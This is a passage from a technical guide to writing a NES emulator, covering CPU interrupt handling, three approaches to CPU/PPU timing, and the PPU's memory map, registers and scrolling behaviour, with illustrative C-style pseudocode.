#define DMC_IRQ 1
#define FRAME_CNT 2
void dmc_run()
{
//something triggers IRQ...
cpu.irq |= DMC_IRQ;
}
void frame_cnt_run()
{
//something that triggers IRQ...
cpu.irq |= FRAME_CNT_IRQ;
}
//same goes for mapper cartridge IRQs
void cpu_run()
{
...code
if (cpu.irq) //Only one unit need to fire IRQ for it to happen
handle_irq();
}
=========================================================================

=======How to handle NMI/IRQ=============================================

Here is the code that shows an example of what the handler does when
jumping to IRQ or NMI. The NMI has a higher priority than the IRQ
so let say if both NMI and IRQ are triggering NMI will go first.

void cpu_run()
{
//opcodes run first...
if (cpu.nmi)
handle_nmi();
else if (cpu.irq)
handle_irq();
}

void handle_nmi()
{
//fetch op, read next op and throw away
rd(cpu.pc);
rd(cpu.pc);
cpu.fb = 0;
push( cpu.pc >> 8);
push( cpu.pc & 0xFF);
join_flgs();
push(cpu.p);
cpu.fi = 1;
cpu.pc = rd(0xFFFA);
cpu.pc |= (rd(0xFFFB) << 8);
cpu.nmi = 0;
}
void handle_irq()
{
rd(cpu.pc);
rd(cpu.pc);
push(cpu.pc >> 8);
push(cpu.pc & 0xFF);
cpu.fb = 0;
join_flgs();
push(cpu.p);
cpu.fi = 1;
cpu.pc = rd(0xFFFE);
cpu.pc |= (rd(0xFFFF) << 8);
}

=========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++++++Timing+++++++++++++++++++++++++++++++++++++++

Timing is one of the most important things that determines a
good emulator. It decides whether or not the emulator
is slow or not, and decides maintainability and optimizations
that can be done. I will cover a couple methods of timing,
to give the reader a overview of how one can do timing.

=================Example==================================================

int cpu_run(int cycles)
{
/* for anything that is going to be
running alot and inside a loop,
using local vars is faster */

int cycles_remain = cycles;
while (cycles_remain > 0)
{
cpu.opcode = mem_read(cpu.pc++);
switch (cpu.opcode)
{
case opcode:
//do stuff
cycles_remain -= num_cycles;
//using a table can help manage this
//cycles_remain -= cyc_table[opcode];
break;
}
}
return cycles_remain;
}

==========================================================================

The first method used to be the most popular, and one of the fastest.
The idea behind this method is to run X amount of CPU cycles,
which makes around 1 scanline drawn of the PPU
(113 + 2/3 cycles for the NTSC PPU, 106 + 9/16 cycles for the PAL),
We could have sub resolution of a cycle, though if we tried to,
there are no benefits and major speed backs, therefore we do around
at most the integral number the cycles, 114 for the CPU, 107 for the PAL.
and leaving some left over cycles which we add to the next run.

======Example for the above code==========================================

int timing_table[2][16] =
{ { 114, 114, 113 },
{ 106, 107, 106, 107, 106, 107, 106, 107,
107, 106, 107, 106, 107, 106, 107, 107 } };
void nes_run()
{
int c = 0;
int left = 0;
while (run)
{
left = cpu_run(timing_table[region][c++ % region_wrap] + left);
ppu_run_scanline();
apu_run_scanline();
mapper_run_scanline();
//handle interrupts/whatever here
}
}
The table is a way of trying to preserve the the resolution of the
PPU and CPU timing, though the left overs disturb the preservation.
As you can see, that the main unit that we cater to is the PPU, the APU
follows, along with the cartridge extra hardware. This was the way
emulators were written back then, when the timing information for the PPU
wasn't simply available. Why scanline and not a whole frame, one might ask,
because there were some games that write to the end of the scanline
when H-BLANK is occuring that can change the scrolling to the PPU,
and thus output in a differently. This method is called the
"scanline method". A more accurate method of this way is to use the PPU
resolution (NTSC PPU is 3 times faster than the CPU, 3.2 for the PAL),
and use the resolution of 15 = 1 cpu cycle for the NTSC CPU, and 16 for
the PAL CPU. The reason for this is to maintain the ratio of 3 and 3.2
for the NES. With this method, we use the PPU cycle count as 5 = 1 cycle,
to achieve the ratio. (5/15 and 5/16 (add this 5 times) for one full
cycle.) For every CPU cycle we add 15 for NTSC, 16 for PAL,
and when it is time to run the PPU we add 5 to each cycle that the PPU
is ran. Along the way, we can deal with cases where the CPU is affecting
the behavior of the PPU or the APU by having a queue of events, and when
the PPU or APU is ran, it can check the queue of when that event occured
at what CPU time, and act accordingly. As for the PPU raising NMI,
or the APU raising an IRQ, they are deterministic and also relies on the
CPU. So one can write a function that predicts when NMI or IRQ fires,
and act accordingly, and their behavior is changed due to a memory
read/write, so the CPU can also keep track of that by having the code in
memory read/write to re-predict such changes. For APU, we use CPU cycles
because the APU run at the same pace as the CPU.

===========Example========================================================

void run_nes()
{
while (run)
{
predict_nmi(); //add to queue when it triggers
predict_irqs(); //add to queue when it triggers
run_cpu(CPU_PPU_SCANLINE); //use ppu cycle resolution
ppu_run(PPU_PPU_SCANLINE);
apu_run(CPU_PPU_SCANLINE);
}
}
void mem_write(int addr, u8 data)
{
switch (addr)
{
case reg_that_affects_nmi:
repredict_nmi(); //reconfigure the queue
break;
case reg_that_affects_irq:
repredict_irq();//reconfigure the queue
break;
}
}

//do the same for mem_read
We can do this because at the beginning, the NMI and IRQs are predicted
from the start, and the only way to change their times is through
controlled read or writes, allowing this method to be reasonably accurate
and pretty fast.

==========================================================================

==========================================================================

The second method is one of the most accurate form of timing
one can make for the NES. It is known as the "Cycle Based" method.

===================Example================================================

u8 rd(int addr)
{
//handle whatever else that could affect memory or could take more
//cycles here.
cpu._nmi = cpu.nmi;
cpu._irq = cpu.irq && !cpu.fi;
ppu_run();
apu_run();
mapper_run();
return mem_read(addr);
}
void wr(int addr, u8 data)
{
cpu._nmi = cpu.nmi;
cpu._irq = cpu.irq && !cpu.fi;
ppu_run();
apu_run();
mapper_run();
mem_write(addr, data);
}
/* doesn't really matter what order, except that mem_read
and mem_write happens at the end because the CPU
can change the behavior of the PPU and APU, but
since in a real NES, the units runs concurrently,
the change would happen on the next cycle usually. */


void cpu_run()
{
cpu.opcode = rd(cpu.pc++);
switch (cpu.opcode)
{
case opcode: //do stuff
break;
}
if (cpu._nmi)
enter_nmi();
else if (cpu._irq)
enter_irq();
}

void nes_run()
{
while (run)
{
cpu_run();
}
}
With this version, instead of running the ppu/apu/mapper hardware
once every X cycles, we run those every memory access, which is every
cycle. This form of timing is called "Per Cycle" and it is the most
accurate method of all, since no cycle is missed, and everything runs in
sync. The _nmi and _irq temporary variables are introduced because NMI
and IRQ is set by the PPU and the APU, but it does not take effect
until *ONE* cycle later, which sometimes can cause IRQ/NMI to run one
opcode later, as we can see that the CPU continuously recieves one opcode
at a time and then handle the NMI/IRQ at the end.
Just a glance shows how much more accurate this version is than the
first version, since it can handle small changes to cycle accuracy.
The major downside to this method is the major speed hit the program
takes using this method. This is a good method for newcomers to
use because of the relative ease one can handle NMIs or IRQs, or PPU
scrolling writes, because it runs on every cycle, allowing you to check
for such cases with a simple conditional branch. This method also helps
you with how the NES work per cycle, allowing you to understand what goes
on behind the NES every cycle, so I recommend writing an emulator with
this method first, so you can understand the NES so much better,
before going into faster methods that require more understanding of
the NES. Note that this method, you run one opcode worth of time
whenever you call cpu_run(). There are no cycle parameter
in cpu_run() as we can see.

==========================================================================

A third way that is becoming a popular method of timing is the
"Catch-up" method. With this method, the idea is to keep running
CPU running for a whole frame, and then whenever a memory mapped
register gets written to that affect the behavior of the PPU or the
APU, you run the PPU/APU to "catch up" with the CPU. Thanks to
Disch for writing about this method going to be incroporated in here.
The idea is to keep a CPU timestamp and a PPU timestamp, and for
every CPU cycle that is execute, increment the CPU timestamp by 15
for NTSC, 16 for PAL, and 5 for the PPU timestamp, and then the
cpu_run() function will accept an runto parameter that is ran to that
amount of time, usually a whole frame worth of time, and during the
run, if any code that affects the PPU or APU, it is ran to catch up
to the CPU to that point, and then the change takes place.

===================Example===============================================

void run_nes()
{
while (run)
{
cpu_run(WHOLE_FRAME);
ppu_run(cycles_needed_to_sync_with_cpu);
apu_run(cycles_needed_to_sync_with_cpu);
}
}
void mem_write(int addr, u8 data)
{
switch (addr)
{
case reg_that_affects_ppu:
ppu_run(cycles_needed_to_sync_with_cpu);
//make write
break;
case reg_that_affects_apu:
ppu_run(cycles_needed_to_sync_with_cpu);
//make write
break;
}
}
//same goes for the mem_read
With this method, we save much function calls, and alot of
timing checks by just having the PPU or APU catch up with the
CPU whenever it needs the behavior changing. This method
works well for games that doesn't change the behavior
of the PPU/APU often, and for those that does, the speed
won't be that bad either. As you can see with the implementation,
you need to be able to exit and re-enter the PPU/APU at an
arbitary time, so variables such as what scanline it is on
or what apu cycle it is needed.

==========================================================================

--------------------------------------------------------------------------
IV. PPU (Picture Processing Unit)

The PPU is the unit of the NES that renders graphics.
It is a separate unit from the CPU and has its own registers
and memory maps. The PPU native resolution is 256x240, though
NTSC TV doesn't display the top and bottom 8 pixels. It draws
the graphics using the name tables, the pattern tables, the attribute
tables, and the palettes, which will be explained how later.

+++++++++PPU Memory Map+++++++++++++++++++++++++++++++++++++++++++++++++++

The PPU is big endian (it stores the graphics in MSB,
and the "program counter" address of it is MSB.)
Here is the memory map of the PPU, in bytes.

The Sprite Table [0, 0xFF]:
This is a separate memory map from memory locations below,
meaning it does not lie in the pattern tables listed below. This is
the data where the sprite information are stored, such as the position
of it, wheter or not it is to be drawn, etc. Each sprite information
is 4 bytes each, so the NES can store up to 64 sprites (256/4).
You can write to this table by using OAMDATA using the OAMADDR as the
index.

Here is what each byte does:

==========Sprite Data=====================================================

Byte 0
Y position of top of sprite. The sprite data is delayed by one
scanline due to the way the sprite is fetched, which is covered later.
So for game programmers, you must subtract 1 from the sprite's Y
coordinate before writing it here. Hide a sprite by writing any values in
0xEF to 0xFF here, because the NES width is only 240, and since 0xEF
is 239 (the NES uses scanline numbering form of 0 to 239),
taking in account of the delayed by 1 scanline , thus,
it doesn't get drawn. 0xEF gets detected however, and the normal
sprite fetches are applied to that scanline, but it just doesn't get drawn.

Byte 1
Tile index number
For 8x8 sprites, the tile number of this sprite. For 8x16 sprites:
76543210
||||||||
|||||||+- Bank (0x0000 or 0x1000 address line used for tile fetching)
+++++++-- Tile number of top of sprite (0 to 254;
bottom half gets the next tile)

Byte 2
Attributes
76543210
||||||||
||||||++- Palette (4 to 7) of sprite
|||+++--- Unimplemented, reads back as 0
||+------ Priority (0: in front of background; 1: behind background)
|+------- Flip sprite horizontally
+-------- Flip sprite vertically

Byte 3
X position of left side of sprite
X-scroll values of F9-FF do NOT result in the sprite wrapping around to
the left side of the screen, it doesn't get shown. Most programs write
to a copy of OAM somewhere in CPU addressable RAM (often 0x0200-0x02FF)
and then copy it to OAM each frame using the OAM_DMA (0x4014) register.

==========================================================================

The Sprite Buffer [0, 0x20]:
This is a 32 bytes buffer that is used to store the data of the sprite
during rendering, the PPU reads from here to figure out which sprite to
draw. Due to it being 32 bytes, it can hold up to 8 sprites a scanline,
(32/4) = 8. For programmers of the NES, there is no way to access this
buffer by regular means, the only way is to read 0x2004 during the PPU
rendering for the sprite data in here to be exposed.

The Pattern Tables [0, 0x1FFF]:
The pattern table stores the 2 lower bits of nibble that
is used to index the palette for what color to draw on the screen.
This is what the CHR-ROM in the game cartridge (if it has any) is.
If the game has CHR-ROM inside, it is loaded to this memory space, trying
to write data to it if it has CHR-ROM will not change the contents of the
registers, since it is "ROM", however, if the game is CHR-RAM based, then
it is allowed to change the contents of the registers on a write.
CHR-RAM is basically using PRG-ROM code space to hold the graphics, and
copying them to the address to draw. To figure out if the game is using
CHR-RAM, check to see if the CHR-ROM is 0 inside the header, although
some games can use both, for that, check the mapper number/board name of
the game file. The 2 lower bits are accessed by writing to the name table
which tile you want to use. The 2 lower bits are obtained from 2 separate
bytes, which the 2 bits are 8 bytes apart, because a tile is 8x8 pixels,
so 8 bit in 8 bytes has the same resolution. For example, let say the tile
we want is start at the pattern_table[0], the first pixel. Since the PPU
is MSB, the first bit is (pattern_table[0] & 0x80) and the second bit is
(pattern_table[7] & 0x80), so the lower 2 bits to the index that accesses
the palette to produce a color onto the screen is
pixel_index = ((pattern_table[0] & 0x80) >> 7) |
((pattern_table[7] & 0x80) >> 6));
The lower 2 bits also determines wheter the pixel is
transparent, that is it uses the master color (0 index)
of the palette or not. If the 2 bits are 0 then it is
transparent, that is, if the 2 bits are 0, then the
attribute table which is the upper 2 bits, are not used.

The Name Tables [0x2000, 0x23BF] [0x2400, 0x27BF]
[0x2800, 0x2BBF] [0x2C00, 0x2FBF]:
The NES has 4 name tables, arranged in a 2x2 block pattern,
each 0x400 bytes each. Here is a visual representation of it.

(0,0) (256,0) (511,0)
+-----------+-----------+
| | |
| | |
| 0x2000 | 0x2400 |
| | |
| | |
(0,240)+------------+-----------+(511,240)
| | |
| | |
| 0x2800 | 0x2C00 |
| | |
| | |
+------------+-----------+
(0,479) (256,479) (511,479)

The 2 dimensional coordinates of it is the corresponding pixels on the
screen, that is, if it draws in linear order. Each name table does not
have its own memory space, without some extra mapper hardware from the
game cartridge, instead it has a couple of ways of mirroring. Here is the
form of mirroring the NES can use:

Horizontal Mirroring:
[0x2000, 0x23FF] mirrors [0x2400, 27FF]
[0x2800, 0x2BFF] mirrors [0x2C00, 0x2FFF]

Vertical Mirroring:
[0x2000, 0x23FF] mirrors [0x2800, 0x2BFF]
[0x2400, 0x27FF] mirrors [0x2C00, 0x2FFF]

One Screen Mirroring: All address points to the same data.
Enabled by a mapper usually.

4 screen Mirroring: Each addresses have their own memory space.
Enable by a mapper usually.

One byte of the name table holds the address of one tile (8x8 pixel),
making up 32x30 (0x3C0 bytes) rows of data. (32*8) = 256 and (30*8)=240,
thus making one name table the resolution of the PPU.

The Attribute Table [0x23C0, 0x23FF] [0x27C0, 0x27FF]
[0x28C0, 0x28FF] [0x2FC0, 0x2FFF]:
The attributes table are the upper 2 bits to the nibble of the byte
that will be the index to the color palette used to draw to the screen.
It is the 64 bytes at the end of the nametable, The location of the data
in the name table will determine which 2 bits in this 64 byte table will
be used. It has 4 extra bytes that isn't used for anything, since there
are 960 tiles and one byte corresponds to 4x4 (32*32 pixels) tiles,
(960/(4*4) = 60 bytes), shows that the the last 4 bytes are indeed not
used. Each byte in the attribute table stores 32x32 upper 2 bits, which
is shared across 2 tiles each. Visual representation of a byte in the
attribute table.

2 bits inside the attribute table is shared by 2 tiles,
making up 4 grouping of 8x8 pixels, making one attribute
byte controlling 32x32 block pixels.

+---+---+---+---+
| | | | |
+ D1-D0 + D3-D2 +
| | | | |
+---+---+---+---+
| | | | |
+ D5-D4 + D7-D6 +
| | | | |
+---+---+---+---+

An example, name_table[0, 3] is used in byte 0 of the attribute table,
and the next name_table[4, 7] will use byte 1 of the attribute table,
and then so on until it does this 8 times, then it loops back
so name_table[32, 35] will use byte 0 of the attribute table
again, as the pictoral version show, it goes horizontal all 8
times, each with 4 tiles in the horizontal of a byte, covering
256 pixels (the horizontal resolution of the NES) before
it goes back to 0.

Mirror of the Name Table: [0x3000, 0x3EFF]
These are mirror of the name table and attribute table,
that is, if the address is in this range, what will be accessed
is data[address - 0x1000];

The Palette: [0x3F00, 0x3FFF]
The palette is the color index that is used to determine
what color will display at a pixel, it is not RGB based,
but instead, based on Hue/Saturation/Value,
which is the byte in the palette corresponds to

76543210
||||||||
||||++++- Hue,
||++----- Value, attribute table
++------- Unimplemented, reads back as 0

while the index to access the palette
byte can be viewed as

43210
|||||
|||++- Pixel value from tile data
|++--- Palette number from attribute table or OAM
+----- Background/Sprite select

Here is the table for the palette, that tells what each byte does:

0x3F00 Universal background color
0x3F01-0x3F03 Background palette 0
0x3F05-0x3F07 Background palette 1
0x3F09-0x3F0B Background palette 2
0x3F0D-0x3F0F Background palette 3
0x3F11-0x3F13 Sprite palette 0
0x3F15-0x3F17 Sprite palette 1
0x3F19-0x3F1B Sprite palette 2
0x3F1D-0x3F1F Sprite palette 3

Addresses $3F04/$3F08/$3F0C can contain unique data,
though these values are not used by the PPU when rendering.
Addresses $3F10/$3F14/$3F18/$3F1C are mirrors of $3F00/$3F04/$3F08/$3F0C.
The palette will be filled with whatever values that represent color in
your graphic API.
The palette is is 64 byte in size * (2^3) from the color emphasis bits,
making it 512 bytes in total. Here are the colors that is makes up the
table. The color table used in the NES is not RGB, instead the NES
uses hue/luminance to represent the color, and TV displays different
color depending on the settings. So here are the guidelines for the color
table.

(It goes from darker color at the bottom to lighter at the top.
0x00, 0x10, 0x20, 0x30 = dark gray to white.
0x01, 0x11, 0x21, 0x31 = dark blue (purpleish) to light blue.
0x02, 0x12, 0x22, 0x32 = dark blue but lighter than 1 goes on to light blue.
0x03, 0x13, 0x23, 0x33 = dark purple/pinkish to lighter purple/pinkish
0x04, 0x14, 0x24, 0x34 = dark pink to lighter pink
0x05, 0x15, 0x25, 0x35 = dark red/orange to lighter red/orange.
0x06, 0x16, 0x26, 0x36 = dark orange to lighter orange.
0x07, 0x17, 0x27, 0x37 = dark brownish to lighter brown.
0x08, 0x18, 0x28, 0x38 = dark brown to lighter brown.
0x09, 0x19, 0x29, 0x39 = dark green to lighter green.
0x0A, 0x1A, 0x2A, 0x3A = greenish to lighter green.
0x0B, 0x1B, 0x2B, 0x3B = dark green to lighter green
0x0C, 0x1C, 0x2C, 0x3C = dark bluish to lighter cyan
0x0D, 0x1D, 0x2D, 0x3D, 0x0E, 0x1E, 0x2E, 0x3E, 0x0F, 0x1F
0x2F, 0x3F are all black.

As for the other 448 bytes, they are in ratio with each other of the
base, thanks to quietust for measuring the values. I am not sure what the
ratio for the PAL is, but most emulator set the same emphasis factor
for both of them, so I think this can be used for PAL, don't take my word
on it. The palette color values is really up to you as long as it follows
the colors above.

static const float ntsc_emphasis_factor[7][3]
{
{1.00, 0.80, 0.81},
{0.78, 0.94, 0.66},
{0.79, 0.77, 0.63},
{0.82, 0.83, 1.12},
{0.81, 0.71, 0.87},
{0.68, 0.79, 0.79},
{0.70, 0.70, 0.70}
};

[0x4000, 0xFFFF]
These addresses are mirrors of the the of the
memory space [0, 0x3FFF], that is, any address
that falls in here, it is accessed by data[addr & 0x3FFF].
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++PPU Registers++++++++++++++++++++++++++++++++++++++++++++++++++++++

Here are the PPU memory mapped registers, they are 8 bit in size
except for a register (0x2006 which is 15 bits wide), they are accessed
in the CPU memory map.

PPUCTRL (0x2000):
This is a a write only register, reading it will
return open bus. Here is the list of what each
bit in the write do.

76543210
||||||||
||||||++- Base nametable address
|||||| (0 = $2000; 1 = $2400; 2 = $2800; 3 = $2C00)
|||||+--- VRAM address increment per CPU read/write of PPUDATA
||||| (0: increment by 1, going across; 1: increment by 32, going down)
||||+---- Sprite pattern table address for 8x8 sprites (0: $0000; 1: $1000)
|||+----- Background pattern table address (0: $0000; 1: $1000)
||+------ Sprite size (0: 8x8; 1: 8x16)
|+------- PPU master/slave select (has no effect on the NES)
+-------- Generate an NMI at the start of the
vertical blanking interval (0: off; 1: on)

The select bits such as the base name table address and sprite
pattern table will be explained in a later section. Writing
here can trigger multiple NMIs explained later.

PPUMASK (0x2001):
This is a write only regiser, reading it will return open bus. This
register controls some operations of the PPU when it writes to the screen.

76543210
||||||||
|||||||+- Grayscale (0: normal color; 1: AND all palette entries
||||||| with 0x30, effectively producing a monochrome display;
||||||| note that colour emphasis STILL works when this is on!)
||||||+-- Enable background in leftmost 8 pixels of screen (0: no; 1:yes)
|||||+--- Enable sprite in leftmost 8 pixels of screen (0: no; 1: yes)
||||+---- Enable background rendering
|||+----- Enable sprite rendering
||+------ Intensify reds (and darken other colors)
|+------- Intensify greens (and darken other colors)
+-------- Intensify blues (and darken other colors)

PPUSTATUS (0x2002):
This register returns the status of the PPU. This is read-only.
Writing to it does nothing.

76543210
||||||||
|||+++++- Unimplemented (read back as open bus data)
||+------ Sprite overflow. The PPU can handle only eight sprites on one
|| scanline and sets this bit if it starts dropping sprites.
|| Normally, this triggers when there are 9 sprites on a scanline,
|| but the actual behavior is significantly more complicated.
|+------- Sprite 0 Hit. Set when a nonzero pixel of sprite 0 'hits'
| a nonzero background pixel. Used for raster timing.
+-------- Vertical blank has started (0: not in VBLANK; 1: in VBLANK)


Reading here in vblank at a certain time can turn off NMI for the frame,
that will be explained later.

OAMADDR (0x2003):
The address of where OAMDATA will use, it is also the starting address
that SPRDMA will use to to write data to the sprite address. it is write
only, reading will return open bus. Writing here during the PPU rendering
might mess up the sprite rendering, though the exact behavior isn't
figured out yet.

OAMDATA (0x2004):
This the the register used to communicate with the sprite data, it
returns whatever is in the OAMADDR is set to when the PPU is not rendering
graphics, if it is, then it returns what the PPU is reading from the
sprite data to render onto the screen. The OAMADDR is auto incremented
on writes to this. Attribute regs bit 5 to 8 are unimplemented,
read back 0 here, so data &= 0xE3. Reading here increments the OAMADDR,
when it is over 0xFF mark, it wraps back to 0. Writing here does *not*
increment the OAMADDR however.

PPUSCROLL (0x2005):
This affects where the PPU will read from the name table.
It modifies the horizontal and vertical offset of the name table read, a
detailed explanation of it will be given in a later section.

Example code that sets it:
lda cam_position_x
sta PPUSCROLL
lda cam_position_y
sta PPUSCROLL

PPUADDR (0x2006):
This is the register where you write the address that you want to
read from or write to using PPUDATA (0x2007). Games must not ever
write to this address during rendering, or it will mess up the display,
this will be explained in a later section. Reading here will return
open bus. During rendering the address written here will be the
"program counter" for the PPU, so this is why it messes up, because
the PPU also increments that register as its rendering leading to
addresses you don't want. Only use this during vblank to update
graphic data.

PPUDATA (0x2007):
This address is used to write or read data from the specified address
in PPUADDR (0x2006). Do not read from or write to this address during
rendering, it will mess up the display. If you do read from it it returns
the internal operation of the PPU, and if you write to it, it writes to
address the PPU currently is using to get data to draw to the screen.
The reason it messes it up is because it increments the "program counter"
of the PPU which causes distortions to the rendering. I believe the
rationale for incrementing the program counter automatically on a read or
write is to help the programmer save precious VBLANK time from
manually incrementing it themselves. Since the only time you can write
to the graphics or read from it is VBLANK or when the PPU is turned "off".
Reads are delayed by one cycle, discard the first byte read, in example,
here is how one reads 0x2007:
tmp = cpu.reg2007; cpu.reg2007 = data; return tmp;
However, if the address is in the palette range, that is (0x3F00 to 0x3FFF)
accesses the address, without the delayed read. On writes to the 0x2007
register, if the game uses CHR-ROM, writing to memory address [0, 0x1FFF]
should do nothing, while it works normally for CHR-RAM.
PPUADDR is incremented with the value set in PPUCTRL after every read or
write to 0x2007. There is one last quirk, and that is if the register
0x2006 address is in the palette range, that is if the range is
((ppu.reg[6] & 0x3F00) == 0x3F00) what is returned is the palette data,
but what is copied to the delayed buffer is addr[ppu.reg[6] - 0x1000];

SPRDMA (0x4014):
You write the starting address of where you want to write the data to
the SPR data. The address written is shifted by 8 (xx00) since it copies
256 bytes starting with 0 to fill up the sprite memory space.
This operations takes 513 cycles, 1 cycle for read,
1 cycle for write, (256 * 2) = 512, and 1 last read cycle.
Here is the code for to show it more clearly:

static void wr_spr_dma(u8 data)
{
// tmp = data * 0x100
int i, k, tmp = data << 8;
for (i = 0; i != 0x100; ++i)
{
//513 cycles 1 for read
//1 write, final is read
k = rd(tmp | i);
rd(tmp | i);
ppu.spr_data[(nes.ppu.reg[3] + i) & 0xFF] = k;
}
rd(cpu.pc);
//as you can see, this operation halts the CPU,
//the APU/PPU is still running but the CPU needs to wait
//until this is finished.
}


Note about open bus: The PPU open bus doesn't work like the CPU open bus,
here is how it works, as explained by dvdmth.
Unimplemented bits in the regs get the value of what
was last written since writing to the PPU address
lines [0x2000, 0x3FFF]. The data just wrote gets
placed on a latched register so reading an
unimplemented address line, gets the latched
register just written to a r/w port.
Here is a full example of how open bus relates.

u8 read_ppu_reg(int addr)
{
switch (addr & 7)
{
//reg 0x2000, 0x2001, 0x2003, 0x2005, 0x2006
//are unimplemented as read, so it returns open bus
case 0: case 1: case 3: case 5: case 6:
return ppu.open_bus;
break;
case 2:
tmp = ppu.reg[2];
tmp |= (ppu.open_bus & 0x1F);
//because reg 0x2002 lower 5 bits are unimplemented
//reading 0x2002 will cause it to
//put bit 5-7 onto the latch, since the lower is unimplemented
//no writing to that buffer.
ppu.open_bus &= 0x1F;
ppu.open_bus |= (ppu.reg[2] & 0xE0);
return tmp;
break;
case 4:
ppu.open_bus = ppu.spr_data[ppu.reg[3]];
return stuff;
break;
case 7:
ppu.reg[7] = data; //set the data first
ppu.open_bus = ppu.reg[7];
return stuff;
}
}
void write_ppu_reg(int addr, u8 data)
{
switch (addr & 7)
{
case 0: case 1: case 3: case 5: case 4: case 6: case 7:
ppu.open_bus = data;
}
}

==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++The Gritty Details of the PPU++++++++++++++++++++++++++++++++++++
We will use the convention of the scanline starting from -1 and up to
the end scanline. We have 20 scanline of vblank time for NTSC,
and 70 scanline for PAL. The height is 240, and then there are
1 scanline used to obtain the data for pre drawing, and 1
scanline does nothing but run (No rendering or anything).
Summing up, we have 262 scanlines for the the NTSC NES, and 312 scanlines
for the PAL.

To figure out the refresh rate, we do a little math
using the formula CPU_FREQ/(NUM_SCANLINES*CPU_FREQ_PER_SCANLINE),
and plugging in for NTSC 1789772/(262*(113+2/3)), we get ~60 Hz
for the NTSC PPU and 1662607/(312*(106+9/16)) for PAL, giving us ~50 Hz.
As we know the, the NTSC PPU runs 3 times the speed of the CPU,
and 3.2 for PAL, Thus, there are 341 PPU cycles in the PPU
(113+2/3)*3 = 341, and (106+9/16)*3.2 = 341.

The NTSC PPU has a quirk however, that on every first scanline, it is
one cycle shorter, so the first scanline is 340 cycles instead of
341 on every odd frame that is rendering. If the PPU rendering is off,
(background and sprite is disabled) through reg 0x2001, then it is the
normal 341 cycles for all PPU scanlines. Blargg recently did some testing
on the NES NTSC PPU and found these new information stated here.

===================Blargg's Info===========================================

The PPU has an even/odd flag that is toggled every frame,
regardless of whether the BG is enabled or disabled.

With BG disabled, each PPU frame is 341*262=89342 PPU clocks long.
There is no skipped clock every other frame.

With BG enabled, each odd PPU frame is one PPU clock shorter than normal.
I've (blargg) timed this to occur around PPU clock 328 on scanline 20,
(20 in this case is -1 in this document)
but haven't written a test ROM for it yet.

By keeping BG disabled until after the time when the clock is skipped
on odd frames, you can get a different color dot crawl pattern than normal
(it looks more like that of interlace, where colors flicker between
two states rather than the normal three). Presumably Battletoads
(and others) encounter this, since it keeps the BG disabled until
well after this time each frame.


On startup, the CPU/PPU falls into one of the alignment with
each other, the emulator doesn't need to worry about this however,
since we can choose whatever alignment we want, generally exact with
the CPU.

* The NTSC PPU runs at 3 times the CPU clock,
so for a given power-up PPU events can occur on one of
three relative alignments with the CPU clock they fall within.
The PPU uses a different master clock divider, so there are more
than just three alignments possible before powering up.
The results below only cover one particular set of alignments
(the one with the fewest special cases).

* Synchronizing with the PPU clock: If BG rendering is off,
each frame will be 29830.6667 CPU clocks long. If the CPU checks
the VBL flag in a loop every
29831 clocks until it is set, at some point it will end when
the VBL flag is set just before the CPU reads it:

PPU 29830.7 29830.7 29830.7 29830.7
-C--P-------C--P-------C-P-------CP-------*
CPU 29831 29831 29831 29831

* The above synchronization will result in an exact PPU/CPU alignment.

-|--.--V--|- -|--V--.--|- -V--.--.--|-
Read Read Read
Loop will stop here
==========================================================================

========================Sprite Priority===================================

Here is how the sprite priority works, as documented in nesdevwiki
What really happens in the NES PPU is conceptually more like this:

1. During sprite evaluation for each scanline (cycles 256 to 319),
the eight frontmost sprites on this line get drawn front (lower index)
to back (higher index) into a buffer, taking only the first opaque pixel
that matches each X coordinate. Priority does not affect ordering in
this buffer but is saved with each pixel.
2. The background gets drawn to a separate buffer.
3. For each pixel in the background buffer, the corresponding sprite
pixel replaces it only if the sprite pixel is opaque and front
priority.

(Low-level hardware detail: The buffers don't actually exist as
full-scanline buffers
inside the PPU but instead as a set of counters and shift registers.
The above logic is implemented a pixel at a time.)

==========================================================================

Now the PPU draws 1 pixel every cycle, and it does it for 256 cycles,
for 256 horizontal pixels, while it does that, it also fetches new data
to draw along with decoding the sprite. Knowing that the PPU draws
1 pixel a cycle, we can use this to justify the first dummy scanline,
that is, the scanline that is not on screen, but still rendering the data.
The first dummy scanline acts like the other scanlines, getting the data
the same way, but it is not displayed, the whole purpose of it is to get
the 2 tiles at the end, which is used for drawing the 16 pixels in the
next scanline, giving the PPU some leeway for it to fetch the other tile
datas to draw. Why 2 tiles, and not just 1? The reason for this has to do
with a [0, 7] value called inc_x which when the PPU draws, it renders as
pixel_data[cycle+inc_x]. Fine X is set by writing to register 0x2005,
which is covered later. Then the PPU starts rendering 240 scanlines for
to cover 256x240 resolution of the NES. There is one extra scanline that
doesn't seem to do anything except run, no rendering, nor any change
to the PPU data. At the end of the scanline, VBLANK begins, allowing the
game programmer to be able to write to the PPU without messing
up the display or data, since in VBLANK, the PPU does nothing
(no rendering or memory fetches), then the process starts all over again.
The NES has 2 layers of graphics, the background layer and
the sprite layer, more will be shown on how they interact
in the PPU per-cycle explanation.

Before moving on to what the PPU does every cycle,
we will show first what writing 0x2000
address or 2005/2006 does to the scrolling. Thanks
to loopy for figuring this out. Documents
generally refer this as loop_v and loopy_t.

======Registers that effect scrolling=====================================

void reg_2000_wr()
{
/*
2000 write:
t:xxxxABxxxxxxxxxx=d:xxxxxxAB
t is treg6 in this case
*/

ppu.treg6 &= 0x73FF;
ppu.treg6 |= ((data & 0x03) << 10);
}
void reg_2005_wr()
{
//0x2005 is latched,
//so it takes 2 writes to fully
//write the data, on startup
//ppu.scroll_latch is set.

/* from loopy's docs
t is treg6 while x is the fine x
how it's used and what it represents
is shown later

2005 first write:
t:xxxxxxxxxxxABCDE=d:ABCDExxx
x=d:xxxxxABC
2005 second write:
t:xxxxxxABCDExxxxx=d:ABCDExxx
t:xABCxxxxxxxxxxxx=d:xxxxxABC

*/

//corresponding code
if (ppu.scroll_latch)
{
ppu.treg6 &= 0x7FE0;
ppu.treg6 |= ((data & 0xF8) >> 3);
ppu.inc_x = data & 0x07;
}
else
{
ppu.treg6 &= 0xC1F;
ppu.treg6 |= (((data & 0xF8) << 2)
| ((data & 0x07) << 12));
}
ppu.scroll_latch ^= 1;
}

void reg_2006_wr()
{
/* from loopy's docs
t is treg6 while v is reg[6]
how it's used and what it represents
is shown later */


/*
2006 first write:
